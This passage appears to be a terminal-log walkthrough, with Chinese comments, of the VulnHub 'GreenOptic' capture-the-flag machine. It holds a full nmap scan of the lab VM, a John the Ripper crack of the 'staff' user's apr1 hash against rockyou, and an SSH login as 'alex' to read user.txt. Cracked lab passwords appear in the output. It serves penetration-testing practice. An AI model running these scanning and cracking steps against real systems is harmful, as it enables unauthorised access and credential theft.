vim ~/.bashrc # some more ls aliases 增加行,输入下面内容 alias nmap='nmap -A -p- -v -T4 -oA nmap' :wq source ~/.bashrc # 使用nmap IP即可实现nmap -A -p- -v -T4 -oA nmap IP
root@kali:~/桌面/vulnhub/greenoptic# cat nmap.nmap # Nmap 7.80 scan initiated Sun Sep 27 16:28:40 2020 as: nmap -A -p- -v -T4 -oA nmap 192.168.10.63 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for websrv01.greenoptic.vm (192.168.10.63) Host is up (0.00042s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 46:20:32:ed:f0:74:11:ed:fd:a7:a4:17:ab:f6:f0:21 (RSA) | 256 b6:fb:64:10:39:0e:f9:be:8b:5a:d0:d2:41:3e:67:68 (ECDSA) |_ 256 24:27:0b:c9:35:5f:27:7e:1a:82:73:e0:69:cc:0f:96 (ED25519) 53/tcp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7) | dns-nsid: |_ bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-methods: | Supported Methods: GET HEAD POST OPTIONS TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: GreenOptic 10000/tcp open http MiniServ 1.953 (Webmin httpd) |_http-favicon: Unknown favicon MD5: DA33730BE67AF90A4689A1C914AEBD69 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: MiniServ/1.953 |_http-title: Site doesn't have a title (text/html; Charset=utf-8). MAC Address: 08:00:27:B8:57:A1 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9 Uptime guess: 0.111 days (since Sun Sep 27 13:51:27 2020) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
TRACEROUTE HOP RTT ADDRESS 1 0.42 ms websrv01.greenoptic.vm (192.168.10.63)
Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Sep 27 16:31:30 2020 -- 1 IP address (1 host up) scanned in 170.20 seconds
root@kali:~/桌面/vulnhub/greenoptic# echo 'staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.' > hash.txt root@kali:~/桌面/vulnhub/greenoptic# cat hash.txt staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po. root@kali:~/桌面/vulnhub/greenoptic# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) Press 'q' or Ctrl-C to abort, almost any other key for status wheeler (staff) 1g 0:00:00:00 DONE (2020-08-01 08:26) 2.325g/s 30530p/s 30530c/s 30530C/s yellow7..princess94 Use the "--show" option to display all of the cracked passwords reliably Session completed
Enter host password for user 'staff':#密码不显示 % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 72324 100 72324 0 0 34.4M 0 --:--:-- --:--:-- --:--:-- 34.4M root@kali:~/桌面/vulnhub/greenoptic# unzip dpi.zip Archive: dpi.zip [dpi.zip] dpi.pcap password: inflating: dpi.pcap
root@kali:~/桌面/vulnhub/greenoptic# ssh [email protected] [email protected]'s password: Last login: Sun Sep 27 09:16:03 2020 from 192.168.10.12 [alex@websrv01 ~]$ ls tmp.pcapng user.txt [alex@websrv01 ~]$ cat user.txt Well done. Now to try and get root access.
I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
********* Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/ *********